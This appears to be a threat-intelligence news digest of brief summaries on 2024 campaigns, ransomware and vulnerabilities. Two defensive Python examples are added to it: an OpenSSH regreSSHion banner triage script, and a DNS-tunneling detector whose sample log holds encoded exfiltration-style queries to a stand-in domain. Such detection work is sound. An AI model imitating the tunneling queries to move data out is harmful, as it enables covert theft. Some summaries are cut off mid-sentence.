Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data

A North Korean APT group, Kimsuky, was discovered using a malicious Google Chrome extension codenamed TRANSLATEXT to target South Korean academia focused on North Korean affairs in March 2024. Kimsuky is a notorious hacking crew from North Korea that's known to be active since at least 2012, orchestrating cyber espionage and financially motivated attacks targeting South Korean entities.

Router Maker's Support Portal Hacked, Replies With Metamask Phishing

BleepingComputer has confirmed that the helpdesk portal of Canadian router manufacturer Mercku has been compromised and is sending MetaMask phishing emails in response to new support tickets. Mercku supplies equipment to several ISPs and networking companies, including Start.ca, FibreStream, Innsys, RealNett, Orion Telekom, and Kelcom.

Critical OpenSSH Flaw Enables Full System Compromise

A critical vulnerability (CVE-2024-6387), dubbed regreSSHion, has been identified in OpenSSH servers, potentially affecting over 14 million instances exposed on the internet. This remote unauthenticated code execution flaw allows attackers to compromise systems, leading to full system control, malware installation, data manipulation, creation of backdoors, and network propagation.
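A first-pass triage of SSH banners against the affected version window, added here as an example (not the page's or Qualys' code). The flaw is a signal-handler race in sshd; per the Qualys advisory it affects portable OpenSSH 8.5p1 up to but not including 9.8p1 on glibc-based Linux, while releases before 4.4p1 carry the original CVE-2006-5051 bug unless a vendor backported that fix, and OpenBSD is not affected. The banners below are constructed for the demonstration; the status labels are this example's own.

```python
import re

# Constructed SSH server banners for the demonstration (not from the page).
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.3",
    "SSH-2.0-OpenSSH_9.8p1",
    "SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3",
    "SSH-2.0-OpenSSH_4.3p2",
    "SSH-2.0-dropbear_2022.83",
]

# Version windows from the Qualys advisory for CVE-2024-6387 (portable OpenSSH
# on glibc-based Linux): 8.5p1 reintroduced the signal-handler race and 9.8p1
# fixed it; releases before 4.4p1 have the original CVE-2006-5051 bug.
FIRST_REGRESSED = (8, 5, 1)
FIXED = (9, 8, 1)
OLD_FIX = (4, 4, 1)

# Matches "SSH-2.0-OpenSSH_9.6p1 ..." and "SSH-1.99-OpenSSH_..." banners.
BANNER_RE = re.compile(r"^SSH-[12]\.\d+-OpenSSH_(\d+)\.(\d+)(?:p(\d+))?")


def parse_openssh_version(banner):
    """Return (major, minor, portable) or None if the banner is not OpenSSH."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def regresshion_status(banner):
    """Classify a banner by upstream version only (see caveat in triage())."""
    v = parse_openssh_version(banner)
    if v is None:
        return "not-openssh"
    if v < OLD_FIX:
        return "affected-unless-CVE-2006-5051-backported"
    if FIRST_REGRESSED <= v < FIXED:
        return "version-in-affected-range"
    return "not-affected-by-version"


def triage(banners=SAMPLE_BANNERS):
    """Map each banner to its status.

    Caveat: distributions backport the fix without bumping the upstream
    version, so "version-in-affected-range" is a lead for package-level
    verification (e.g. the distro changelog), not a confirmed finding.
    """
    return {b: regresshion_status(b) for b in banners}


if __name__ == "__main__":
    for banner, status in triage().items():
        print(f"{status:42} {banner}")
```

Where an immediate update is not possible, the Qualys advisory notes that setting LoginGraceTime 0 in sshd_config removes the race at the cost of leaving sshd open to connection exhaustion; the banner triage above tells you which hosts to look at first.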

Researchers Warn of Flaws in Widely Used Industrial Gas Analysis Equipment

Multiple security vulnerabilities have been identified in Emerson Rosemount gas chromatographs, potentially allowing attackers to access sensitive information, cause denial-of-service (DoS) conditions, and execute arbitrary commands. The affected models include GC370XA, GC700XA, and GC1500XA, with versions 4.1.5 and earlier. Claroty, an operational technology (OT) security firm, highlighted two command injection flaws and two authentication and authorization vulnerabilities.

Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping

Apple recently released a firmware update to address a critical vulnerability (CVE-2024-27867) affecting various AirPods models (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro. This authentication issue could have allowed a malicious actor within Bluetooth range to impersonate a trusted device and gain unauthorized access to the targeted AirPods.

Kimsuky Group's New Backdoor Appears (HappyDoor)

AhnLab Security Intelligence Center (ASEC) has released details of a backdoor it first identified in 2021 and has closely monitored since. Dubbed HappyDoor, the backdoor is attributed to the North Korean APT group Kimsuky and has been deployed in several breaches over the last couple of years.

The Growing Threat of Malware Concealed Behind Cloud Services

The analysis highlights a growing trend where cybercriminals are leveraging cloud services to enhance the capabilities of botnets like UNSTABLE and Condi. These botnets exploit vulnerabilities in various devices to establish command and control (C2) operations through cloud servers, which provides scalability and anonymity that traditional hosting methods lack.

Linux Version of RansomHub Ransomware Targets VMware ESXi VMs

According to Recorded Future, the RansomHub operation has been using a Linux encryptor since April 2024 to specifically target VMware ESXi environments in corporate attacks. The ESXi version of RansomHub's encryptor is developed in the C++ programming language and was likely derived from the now-defunct Knight ransomware's source code.

Fake Google Chrome Errors Trick You into Running Malicious PowerShell Scripts

A sophisticated malware distribution campaign has emerged, utilizing fake error messages resembling Google Chrome, Microsoft Word, and OneDrive issues to deceive users into running malicious PowerShell scripts. This campaign involves several threat actors, including ClearFake, ClickFix, and TA571, known for their previous involvement in spam distribution and malware dissemination.

Russia's Midnight Blizzard Seeks to Snow French Diplomats

French diplomatic entities have been targeted by Midnight Blizzard, a Russia-backed advanced persistent threat, since at least 2021, according to CERT-FR. The group, infamous for its involvement in the 2016 US election interference and the 2020 SolarWinds supply-chain attack, remains a significant cyber threat.

ONNX Phishing Service Targets Microsoft 365 Accounts at Financial Firms

A new phishing-as-a-service (PhaaS) platform called ONNX Store is targeting Microsoft 365 accounts of employees at financial firms using QR codes embedded in PDF attachments. The platform, which can target both Microsoft 365 and Office 365 email accounts, operates via Telegram bots and includes mechanisms to bypass two-factor authentication (2FA).

New ARM 'TIKTAG' attack impacts Google Chrome, Linux systems

A new speculative execution attack named "TIKTAG" targets ARM's Memory Tagging Extension, achieving over a 95% success rate in leaking data and bypassing this security feature. This attack, demonstrated by researchers from Samsung, Seoul National University, and the Georgia Institute of Technology, affects Google Chrome and the Linux kernel.

Report Reveals Record Exploitation Rate For Load Balancers

Recent data from Action1 indicates a growing trend of threat actors targeting edge devices, particularly load balancers, resulting in a record exploitation rate over the past three years. The study assessed various product categories from 2021 to 2023, using data from the National Vulnerability Database (NVD) and cvedetails.com to calculate the ratio of exploited vulnerabilities to total vulnerabilities.

UNC3944 Targets SaaS Applications

UNC3944, a financially motivated threat group, has been active since at least May 2022 and has evolved its tactics from credential harvesting to primarily data theft extortion without ransomware. They exploit vulnerabilities in software-as-a-service (SaaS) applications and leverage social engineering tactics to gain access to privileged accounts.

GitHub Phishing Campaign Wipes Repos, Extorts Victims

CronUp security researcher German Fernandez has shed light on a phishing and extortion campaign targeting GitHub users. The campaign, which has been ongoing for several months, takes advantage of GitHub's notification system and a malicious OAuth app to gain access to victims' repositories, wipe them, and hold the contents for ransom.

Ukrainian Police Identify Suspected Affiliate of Conti, LockBit Groups

Ukrainian cyber police have identified a 28-year-old resident of Kyiv as a suspected affiliate of the notorious Conti and LockBit ransomware groups. He allegedly specialized in developing cryptors, which are tools that encrypt malware to evade antivirus detection. The man reportedly sold his services to hackers linked to the Conti and LockBit groups for cryptocurrency rewards.

Black Basta Ransomware Gang Linked to Windows Zero-Day Attacks

The Black Basta ransomware group is suspected of leveraging a critical Windows privilege escalation vulnerability, identified as CVE-2024-26169, as a zero-day exploit before Microsoft released a fix. This vulnerability, rated at 7.8 on the CVSS v3.1 scale, affects the Windows Error Reporting Service, enabling attackers to elevate their privileges to SYSTEM level.

Vietnamese Entities Targeted by China-Linked Mustang Panda in Cyber Espionage

Researchers at CrowdStrike Falcon Intelligence first identified a then-unattributed threat actor targeting a U.S.-based think tank with ties to China in April 2017, which led them to a larger campaign attributed to the China-based adversary Mustang Panda. Mustang Panda has likely been operational since 2014, targeting government organizations, nonprofits, religious institutions, and other NGOs across the U.S., Europe, Mongolia, Myanmar, Pakistan, Vietnam, and other regions with malicious LNK files associated with the group.

Lost in the Fog: A New Ransomware Threat

Researchers at Arctic Wolf Labs have released details on a new ransomware variant dubbed "Fog" that has been targeting the networks of US organizations in the education and recreation sectors since May 2024. In one of the incidents observed, Fog ransomware actors performed pass-the-hash attacks to gain access to administrator accounts and then established RDP connections to Windows servers running Hyper-V and Veeam.

UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion

Mandiant has identified a campaign by the financially motivated group UNC5537, targeting Snowflake customer database instances to steal data and extort victims. Snowflake is a multi-cloud data warehousing platform used for storing and analyzing large datasets. UNC5537 gains access to these databases using stolen customer credentials, obtained through various info stealer malware campaigns.

IoT Vulnerabilities Skyrocket, Becoming Key Entry Point for Attackers

The number of vulnerable Internet of Things (IoT) devices has surged by 136% over the past year, according to Forescout's report, "The Riskiest Connected Devices in 2024." This study, which analyzed data from nearly 19 million devices, revealed that the proportion of IoT devices with vulnerabilities increased from 14% in 2023 to 33% in 2024.

Inside Baseball: The Red Sox Cloud Security Game

The Boston Red Sox, positioned at the forefront of the American League East in baseball, are also making significant strides in cybersecurity. By adopting a comprehensive strategy that involves transitioning critical operations to a software-as-a-service (SaaS) model and embracing the Internet of Things (IoT) at Fenway Park, the team is actively bolstering its cloud security.

RansomHub Extortion Gang Linked to Now-Defunct Knight Ransomware

Researchers at Symantec have uncovered similarities between two ransomware families, RansomHub and Knight, indicating a potential rebrand of the now defunct Knight ransomware which went silent after its source code was listed for sale on hacker forums back in February 2024. Similar to Knight ransomware, RansomHub is written in the Go programming language.

Chinese South China Sea Cyberespionage Campaign Unearthed

A cyberespionage campaign recently targeted a government agency that frequently clashes with China over the South China Sea. This campaign used previously undetected backdoors and had links to known Chinese state threat actors. Researchers at Sophos Managed Detection and Response uncovered this complex operation, named "Crimson Palace," and attributed it with high confidence to Chinese state-sponsored hacking clusters.

Zyxel Addressed Three RCEs in End-Of-Life NAS Devices

Zyxel Networks has released an emergency security update to address critical vulnerabilities in its end-of-life NAS devices, specifically NAS326 and NAS542 models. These vulnerabilities, identified as CVE-2024-29972, CVE-2024-29973, and CVE-2024-29974, allow attackers to perform command injection and remote code execution.

Belarusian Hackers Target Ukraine's Ministry of Defence in New Espionage Campaign

Belarusian state-sponsored hackers, UNC1151, targeted Ukraine's Ministry of Defence and a military base in a new cyberespionage operation according to Cyble Research and Intelligence Labs. Mandiant Threat Intelligence uncovered a persistent information operation called “Ghostwriter/UNC1151,” which is part of a larger influence campaign supporting Russian security interests and promoting narratives critical of NATO that has been active since March 2017 targeting audiences in Ukraine, Lithuania, Latvia, and Poland.

IT Consultants Engaged by NIST to Tackle National Vulnerability Database Backlog

Facing a growing backlog of reported vulnerabilities awaiting analysis in the National Vulnerability Database (NVD), the National Institute of Standards and Technology (NIST) has extended its existing commercial contract with Analygence, a Maryland-based IT consultancy with IT and security expertise, to help clear it.

Fake Browser Updates delivering BitRAT and Lumma Stealer

Researchers at eSentire have observed fake web browser updates being used to infect end users with malware strains including SocGholish and Fakebat. In May 2024, eSentire's Threat Response Unit began seeing actors use the same tactic to deliver BitRAT, a remote access trojan, and Lumma Stealer, an info stealer that has gained popularity among cybercriminals.

APT28 Targets Key Networks in Europe With Headlace Malware

On September 4, 2023, CERT-UA reported a phishing campaign that leveraged Headlace malware to target a critical energy infrastructure facility in Ukraine. During this campaign, BlueDelta sent phishing emails from a fake sender address that contained links to archive files. The archive files contained lure images and Windows BAT script, which, if executed, would result in the whoami command being run and the results being exfiltrated back to the threat actor.

Andariel Hackers Target South Korean Institutes with New Dora RAT Malware

The North Korean linked threat actor Andariel has been using a new Golang-based backdoor called Dora RAT to target educational institutions, manufacturing firms, and construction businesses in South Korea. The AhnLab Security Intelligence Center reported that Andariel has deployed a variety of malware, including keyloggers, infostealers, and proxy tools, to control and exfiltrate data from infected systems.

Ransomware Rises Despite Law Enforcement Takedowns

Ransomware activity surged in 2023, according to a report by Google-owned Mandiant, despite extensive law enforcement efforts against major ransomware groups like ALPHV/BlackCat. The report, published on June 3, 2024, revealed a 75% increase in posts on ransomware groups' data leak sites compared to 2022, affecting victims in over 110 countries.

Check Point Warns Customers to Patch VPN Vulnerability Under Active Exploitation

Check Point has alerted its customers to a critical zero-day vulnerability (CVE-2024-24919, CVSS 8.6) affecting several products, including CloudGuard Network and Quantum Maestro. Attackers are exploiting this flaw by targeting outdated VPN local accounts using password-only authentication. Immediate software updates are crucial to mitigate the risk of unauthorized access to sensitive data and potential lateral movement within networks.

The Pumpkin Eclipse

Lumen Technologies' Black Lotus Labs identified a destructive event in which over 600,000 small office/home office (SOHO) routers belonging to a single internet service provider (ISP) were taken offline. The incident took place over a 72-hour period between October 25 and 27, 2023, rendered the infected devices permanently inoperable, and required hardware replacement.

Cyber Espionage Alert: LilacSquid Targets IT, Energy, and Pharma Sectors

A previously undocumented cyber espionage group named LilacSquid has been linked to targeted attacks across various sectors in the U.S., Europe, and Asia as part of a data theft campaign ongoing since at least 2021. This campaign is aimed at establishing long-term access to compromised organizations to siphon data of interest to attacker-controlled servers, according to a new technical report by Cisco Talos researcher Asheer Malhotra.

Important Details About CIRCIA Ransomware Reporting

The Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) mandates covered entities to report cyber incidents and ransomware payments to the Cybersecurity and Infrastructure Security Agency (CISA). CISA aims to swiftly deploy resources, analyze trends, and share information with network defenders.

Brazilian Banks Targeted by New AllaKore RAT Variant Called AllaSenha

Since at least early May, banking institutions in Brazil have been targeted by a new campaign, observed by French cybersecurity company HarfangLab, that deploys a custom variant of the Windows-based AllaKore RAT called AllaSenha. The infection chain involves Python scripts and a loader written in Delphi.

Pirated Microsoft Office delivers malware cocktail on systems

AhnLab Security Intelligence Center is warning of an ongoing campaign in which cybercriminals distribute various malware strains through installers for cracked versions of Microsoft Office promoted on torrent sites. The cracked installer has a well-built interface where users can choose the version to install, the language, and whether to use the 32- or 64-bit variant.

Sav-Rx Discloses Data Breach Impacting 2.8 Million Americans

Prescription management company Sav-Rx is warning over 2.8 million people in the United States that it suffered a data breach, stating that their personal data was stolen in a 2023 cyberattack. A&A Services, doing business as Sav-RX, is a pharmacy benefit management (PBM) company that provides prescription drug management services to employers, unions, and other organizations across the U.S.

The Real Danger Lurking in the NVD Backlog

On February 12, 2024, the NIST National Vulnerability Database significantly slowed its processing and enrichment of new vulnerabilities. Since then, 12,720 new vulnerabilities have been added, but 11,885 remain unanalyzed, hindering security professionals' ability to assess affected software. By February 15, the NVD warned of analysis delays,

US-Led Operation Takes Down World's Largest Botnet

A US-led law enforcement operation has dismantled the 911 S5 botnet, believed to be the world's largest. The botnet consisted of millions of compromised residential Windows computers used for cyber-attacks, fraud, child exploitation, and other serious crimes. It included over 19 million unique IP addresses, with 613,841 in the US. Cybercriminals could buy access to these IP addresses for illegal activities.

Okta Warns of Credential Stuffing Attacks Targeting Its CORS Feature

Identity and Access Management company Okta warns that its cross-origin authentication feature in Customer Identity Cloud (CIC) is susceptible to credential-stuffing attacks. “Okta's Cross-Origin Resource Sharing (CORS) feature allows customers to add JavaScript to their websites and applications to send authentication calls to the Okta API hosted.

New Tricks in the Phishing Playbook: Cloudflare Workers, HTML Smuggling, GenAI

Researchers have raised alarms about sophisticated phishing campaigns leveraging Cloudflare Workers to deploy phishing sites aimed at harvesting credentials from multiple organizations' users. These campaigns utilize a method called transparent phishing or adversary-in-the-middle phishing. This technique involves using Cloudflare Workers as a reverse proxy to legitimate login pages, intercepting traffic to capture login credentials, cookies, and tokens.

Fake Antivirus Sites Spread Malware Disguised as Avast, Malwarebytes, Bitdefender

Trellix Research has uncovered a concerning trend in cybersecurity: fake antivirus websites masquerading as legitimate security software while actually harboring malware. These deceptive sites, such as avast-securedownload[.]com and bitdefender-app[.]com, distribute harmful programs like SpyNote trojan, Lumma malware, and StealC malware under the guise of reputable antivirus brands. Instances of brand reputation attacks like these pose a significant threat, exploiting users' trust in reputable antivirus brands to distribute harmful malware.

Microsoft: Gift Card Fraud Rising, Costing Businesses up to $100,000 a Day

With US holidays like Memorial Day upcoming, Microsoft is warning of an uptick in activity from Storm-0539, a cybercriminal group operating out of Morocco that is known for targeting gift card portals linked to large retailers, luxury brands, and well-known fast-food restaurants. According to Microsoft, Storm-0539 conducts deep reconnaissance and uses sophisticated cloud-based techniques to target gift card creators.

Russian Hackers Shift Tactics, Target More Victims with Paid Malware

Russian hackers, particularly Advanced Persistent Threat (APT) groups, are intensifying their cyberattacks, expanding targets beyond governments and utilizing readily available malware. Flashpoint researchers reveal the evolving tactics, emphasizing the need for organizational protection. Recent reports indicate collaboration among state-sponsored groups in Iran for large-scale attacks, paralleled by activities in Russia.

Cybercriminals Exploit Cloud Storage For SMS Phishing Scams

Security researchers have uncovered a series of criminal campaigns that exploit cloud storage services. These campaigns, orchestrated by unnamed threat actors, aim to deceive users into visiting malicious websites through SMS messages. According to a technical analysis released by Enea today, the attackers have two main objectives.

Japanese Experts Warn of BLOODALCHEMY Malware Targeting Government Agencies

Researchers have recently made a significant revelation regarding the BLOODALCHEMY malware, which has been employed in targeted attacks against government organizations in Southern and Southeastern Asia. These researchers found that BLOODALCHEMY is an updated iteration of Deed RAT, considered a successor to ShadowPad—a widely recognized tool utilized in APT campaigns.

From Trust to Trickery: Brand Impersonation Over the Email Attack Vector

Cisco researchers have discovered various techniques used by cybercriminals to embed and deliver brand logos within emails, targeting users through brand impersonation. This widespread threat leverages the familiarity and trust associated with well-known brand logos to solicit sensitive information, particularly in phishing emails where attackers aim to deceive recipients into revealing credentials or other valuable information.

Inside Operation Diplomatic Specter: Chinese APT Group's Stealthy Tactics Exposed

A Chinese APT group has been targeting governmental entities in the Middle East, Africa, and Asia since late 2022 as part of a cyber espionage campaign named Operation Diplomatic Specter. According to researchers from Palo Alto Networks Unit 42, this group has conducted long-term espionage against at least seven government entities, employing sophisticated email exfiltration techniques.

Threat Actor Claiming Access to AWS, Azure, & GitHub API Keys

According to a post on X (formerly known as Twitter), a threat actor is claiming to have gained access to a handful of API keys for major cloud service providers, including Amazon Web Services (AWS), Microsoft Azure, GitHub, etc. The actor who goes by the alias “carlos_hank,” stated that these keys are “fresh and all working,” with high permissions that can be used to compromise entire cloud infrastructures.

Chinese Hackers Rely on Covert Proxy Networks to Evade Detection

Chinese-backed threat actors, including groups like Volt Typhoon, are increasingly using proxy networks known as operational relay boxes for cyber espionage, according to a Mandiant report published on May 22. ORBs, similar to botnets, are mesh networks comprising compromised devices like virtual private servers, Internet of Things devices, smart devices, and routers.

Iranian MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel

An Iranian threat actor affiliated with one of the Iranian intelligence agencies has been observed conducting destructive wiping attacks that target Albania and Israel. Cybersecurity firm Check Point is tracking the activity under the moniker Void Manticore, which is also known as Storm-842 (formerly DEV-0842) by Microsoft. The techniques, tactics, and procedures (TTPs) employed by Void Manticore are relatively straightforward and simple, involving hands-on efforts using basic, mostly publicly available tools.

Critical Fluent Bit Flaw Impacts All Major Cloud Providers

A critical vulnerability in Fluent Bit has been identified, impacting major cloud providers and numerous tech giants by exposing them to denial-of-service and remote code execution attacks. Fluent Bit, a popular logging and metrics solution for Windows, Linux, and macOS, is embedded in major Kubernetes distributions.

Ransomware and AI-Powered Hacks Drive Cyber Investment

The surge in sophisticated cyber-attacks has led to significant financial implications for businesses. Ransomware attacks, in particular, have become increasingly prevalent and costly. These attacks involve encrypting a victim's data and demanding payment, typically in cryptocurrency, for its release.

New Android Banking Trojan Mimics Google Play Update App

Cyble Research and Intelligence Labs has uncovered a new banking trojan dubbed “Antidot” targeting Android devices by posing as a Google Play update application. Users who install the application are presented with a counterfeit Google Play update page that contains a “continue” button designed to redirect to the Android device's Accessibility settings. I

Springtail: New Linux Backdoor Added to Toolkit

Symantec's Threat Hunter Team recently uncovered a new Linux backdoor, Linux.Gomir, developed by the North Korean Springtail espionage group, linked to a recent campaign against South Korean organizations. This group, also known as Kimsuky, has a history of targeting South Korean public sector organizations and was previously identified in attacks dating back to 2014.

Botnet Sent Millions of Emails in LockBit Black Ransomware Campaign

New Jersey's Cybersecurity and Communications Integration Cell (NJCCIC) disclosed that it uncovered a new LockBit campaign where actors are sending millions of phishing emails with the help of the Phorpiex botnet to infect potential victims with LockBit Black, an encryptor that was likely built using the LockBit 3.0 builder that was leaked by a disgruntled developer on Twitter in September 2022.

Mallox Ransomware Deployed Via MS-SQL Honeypot Attack

An incident involving an MS-SQL honeypot has shed light on the sophisticated tactics employed by cyber-attackers relying on Mallox ransomware. The honeypot, set up by researchers at Sekoia, was targeted by an intrusion set utilizing brute force techniques to deploy the Mallox ransomware via PureCrypter to exploit various MS-SQL vulnerabilities. Upon analyzing Mallox samples, the researchers identified two distinct affiliates using different approaches.

Hackers Use DNS Tunneling to Scan and Track Victims

Threat actors are using DNS tunneling to track when targets open phishing emails and click malicious links, as well as to scan networks for vulnerabilities. DNS tunneling involves encoding data or commands within DNS queries, turning DNS into a covert communication channel. The attackers use various encoding methods, such as Base16, Base64, or custom algorithms, to transmit data via DNS records like TXT, MX, CNAME, and Address records.
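The paragraph above describes the encoding side of DNS tunneling; what a defender usually wants is the detection side. The following added example (not code from the original article or from any vendor report it cites) scores DNS query log lines for the indicators the paragraph names: long, hex- or base64-looking subdomain labels with high entropy, and record types such as TXT, MX and CNAME that are commonly used to carry data back. The log lines, domain names and thresholds are constructed for illustration; the `zone_depth` parameter assumes the attacker controls a two-label registered domain, which a real deployment would replace with a public-suffix lookup.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample query log: "timestamp client qname qtype". Not real traffic.
SAMPLE_LOG = """\
2024-05-10T08:01:02Z 10.0.0.12 www.example.com A
2024-05-10T08:01:05Z 10.0.0.12 mail.example.com MX
2024-05-10T08:01:09Z 10.0.0.45 4a6f686e2e446f65.7468616e6b732e.track.bad-domain.test A
2024-05-10T08:01:10Z 10.0.0.45 ZGF0YS5zZWdtZW50LTEtb2YtMTI.c2VjcmV0.exfil.bad-domain.test TXT
2024-05-10T08:01:12Z 10.0.0.45 ZGF0YS5zZWdtZW50LTItb2YtMTI.c2VjcmV0.exfil.bad-domain.test TXT
2024-05-10T08:01:15Z 10.0.0.12 cdn.static.example.com CNAME
"""

# Labels that look like a hex (Base16) or base64/base64url chunk. Thresholds are
# illustrative assumptions; tune them against your own baseline traffic.
HEX_LABEL = re.compile(r'^[0-9a-fA-F]{16,}$')
B64_LABEL = re.compile(r'^[A-Za-z0-9+/_-]{20,}$')
ENTROPY_THRESHOLD = 3.5      # bits per character; English-like labels sit well below this
PAYLOAD_LENGTH_THRESHOLD = 40  # total characters left of the registered domain
DATA_CARRYING_TYPES = ('TXT', 'MX', 'CNAME')


def shannon_entropy(s):
    """Shannon entropy in bits per character of the string s."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def tunneling_indicators(qname, qtype, zone_depth=2):
    """Return a list of human-readable reasons a query looks like DNS tunneling.

    zone_depth is the number of trailing labels assumed to be the attacker-controlled
    zone (e.g. 2 for bad-domain.test); everything to the left is treated as payload.
    """
    labels = qname.rstrip('.').split('.')
    payload = labels[:-zone_depth]
    reasons = []
    if sum(len(label) for label in payload) >= PAYLOAD_LENGTH_THRESHOLD:
        reasons.append('long subdomain payload')
    for label in payload:
        if HEX_LABEL.match(label):
            reasons.append('hex-encoded label: ' + label)
        elif B64_LABEL.match(label) and shannon_entropy(label) >= ENTROPY_THRESHOLD:
            reasons.append('high-entropy base64-like label: ' + label)
    # Record type alone is not suspicious; it only strengthens an existing finding.
    if reasons and qtype in DATA_CARRYING_TYPES:
        reasons.append('%s record type commonly used to carry data' % qtype)
    return reasons


def analyze_log(log_text, zone_depth=2):
    """Parse the log and return one finding per query that shows tunneling indicators."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, qtype = line.split()
        reasons = tunneling_indicators(qname, qtype, zone_depth)
        if reasons:
            findings.append({'client': client, 'qname': qname,
                             'qtype': qtype, 'reasons': reasons})
    return findings


def unique_subdomains_per_zone(log_text, zone_depth=2):
    """Count distinct query names per registered zone; tunnels produce many unique
    names under one zone, which is a useful second signal alongside per-query scoring."""
    zones = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname, _qtype = line.split()
        labels = qname.rstrip('.').split('.')
        zones['.'.join(labels[-zone_depth:])].add(qname)
    return {zone: len(names) for zone, names in zones.items()}


if __name__ == '__main__':
    for finding in analyze_log(SAMPLE_LOG):
        print(finding['client'], finding['qtype'], finding['qname'])
        for reason in finding['reasons']:
            print('   -', reason)
    print(unique_subdomains_per_zone(SAMPLE_LOG))
```

Run on the constructed log, the three queries to `bad-domain.test` are flagged and the `example.com` names are not. In practice the per-query heuristics generate false positives on CDN and anti-spam lookups that legitimately use hashed labels, so the zone-level count of unique names and the client's query rate are what turn these indicators into an alert.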

Ongoing Campaign Bombards Enterprises with Spam Emails and Phone Calls

Cybersecurity researchers at Rapid7 have uncovered an ongoing social engineering campaign that barrages enterprises with spam emails with the goal of obtaining initial access to their environments for follow-on exploitation. The social engineering tactics involve overwhelming a potential victim's email with junk mail, calling the victim user, and offering them assistance with the issue.

Government's Addiction to Contractors Is Creating a Data Crisis

The rapid advancement of artificial intelligence and the proliferation of data worldwide, estimated to reach 200 zettabytes, have ushered in an era of unprecedented technological growth. However, despite this data abundance, there exists a crisis in accessing research data, with the government and private sector being identified as primary contributors to the problem.

North Korean Hackers Deploy New Golang Malware 'Durian' Against Crypto Firms

The North Korean APT group Kimsuky has been observed by Kaspersky deploying a previously undocumented Golang-based malware dubbed Durian in targeted cyberattacks against two South Korean cryptocurrency firms. Kaspersky states that Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads, and exfiltration of files.

'The Mask' Espionage Group Resurfaces After 10-Year Hiatus

Careto, also known as "The Mask," resurfaced after a lengthy hiatus, launching a cyber-espionage campaign targeting organizations primarily in Latin America and Central Africa. This APT group was initially active from 2007 to 2013, during which it targeted a diverse range of victims across 31 countries, including prominent entities like government institutions, diplomatic offices, energy companies, research institutions, and private equity firms.

GoTo Meeting Loads Remcos RAT via Rust Shellcode Loader

There has been a notable rise in cyber threats exploiting legitimate software platforms to propagate malicious payloads. Among these threats is the Remcos RAT, a sophisticated remote access tool favored by cybercriminals. Cyber attackers have leveraged trusted applications like GoTo Meeting to facilitate the deployment of the Remcos RAT, employing advanced techniques to evade detection and compromise systems.

Widely Used Telit Cinterion Modems Open to SMS Takeover Attacks

Security researchers at Kaspersky's ICS CERT division revealed a series of eight vulnerabilities, including CVE-2023-47610 through CVE-2023-47616, in Telit Cinterion cellular modems, prevalent across industrial, healthcare, and telecommunications sectors. The most severe flaw, CVE-2023-47610, enables remote code execution via SMS, granting attackers unauthorized access to the modem's operating system without authentication.

In the Shadow of Venus: Trinity Ransomware's Covert Ties

CRIL (Cyble Research and Intelligence Labs) has uncovered a new ransomware variant dubbed Trinity, notable for its utilization of a double extortion tactic. This method involves exfiltrating victim data before initiating encryption and subsequently demanding ransom payments. The threat actors behind Trinity operate victim support and data leak sites, enhancing their coercive capabilities (T1486).

GhostStripe Attack Haunts Self-Driving Cars by Making Them Ignore Road Signs

A group of researchers, primarily from Singapore-based universities, has demonstrated the feasibility of attacking autonomous vehicles by exploiting their reliance on camera-based computer vision systems. Dubbed GhostStripe, the attack manipulates the sensors used by brands like Tesla and Baidu Apollo, which rely on complementary metal oxide semiconductor (CMOS) sensors.

New 'LLMjacking' Attack Exploits Stolen Cloud Credentials

The Sysdig Threat Research Team recently conducted a study on a new cyber attack termed “LLMjacking”, which specifically targets cloud-hosted large language model services by exploiting stolen cloud credentials. These credentials were obtained from a vulnerable version of Laravel (CVE-2021-3120).

Hijack Loader Malware Employs Process Hollowing, UAC Bypass in Latest Version

A new version of the malware loader, Hijack Loader, has been spotted by researchers at Zscaler which comes with an updated set of anti-analysis techniques to fly under the radar. In total, the latest variant comes with 7 new modules. Notably, one of these modules is designed to bypass User Account Control (UAC), a security feature on Windows designed to prevent unauthorized changes to the operating system.

Massive Webshop Fraud Ring Steals Credit Cards From 850,000 People

BogusBazaar, a vast network of fake online shops, was discovered by Security Research Labs GmbH to have successfully deceived over 850,000 individuals in the United States and Europe. This operation, which has been active for three years since 2021, has aimed to process around $50 million in fraudulent purchases by stealing credit card information and attempting fake transactions. The operations of BogusBazaar involve the creation of over 75,000 fake webshops.

New Attack Leaks VPN Traffic Using Rogue DHCP Servers

"TunnelVision" is a newly discovered cyber threat that exploits a vulnerability in the Dynamic Host Configuration Protocol to bypass the encryption of VPNs. This attack method, outlined in a report by Leviathan Security, enables malicious actors to intercept and surveil unencrypted data while maintaining the facade of a secure VPN connection.

China-Linked Attackers Successfully Targeting Network Security Devices, Worrying Officials

At the RSA Conference in San Francisco, cybersecurity experts revealed concerns about China-linked espionage groups exploiting zero-day vulnerabilities to infiltrate US critical infrastructure and businesses. Charles Carmakal from Mandiant Consulting highlighted how these attackers target network security devices that lack endpoint detection and response capabilities, such as routers and firewalls.

Critical Tinyproxy Flaw Opens Over 50,000 Hosts to Remote Code Execution

Over 52,000 out of 90,310 hosts with Tinyproxy services are vulnerable to a severe security flaw CVE-2023-49606, which exposes them to potential remote code execution. This vulnerability, with a CVSS score of 9.8 out of 10, affects Tinyproxy versions 1.10.0 and 1.11.1. The vulnerability arises from a use-after-free bug triggered by a specially crafted HTTP Connection header.

China-Linked Hackers Suspected in ArcaneDoor Cyberattacks Targeting Network Devices

ArcaneDoor, a cyber espionage campaign targeting network devices from multiple vendors, including Cisco, has been linked to China-linked actors based on findings from Censys. The campaign, attributed to a sophisticated state-sponsored actor known as UAT4356 or Storm-1849, began around July 2023 and continued with the first confirmed attack using custom malware named Line Runner and Line Dancer in January 2024.

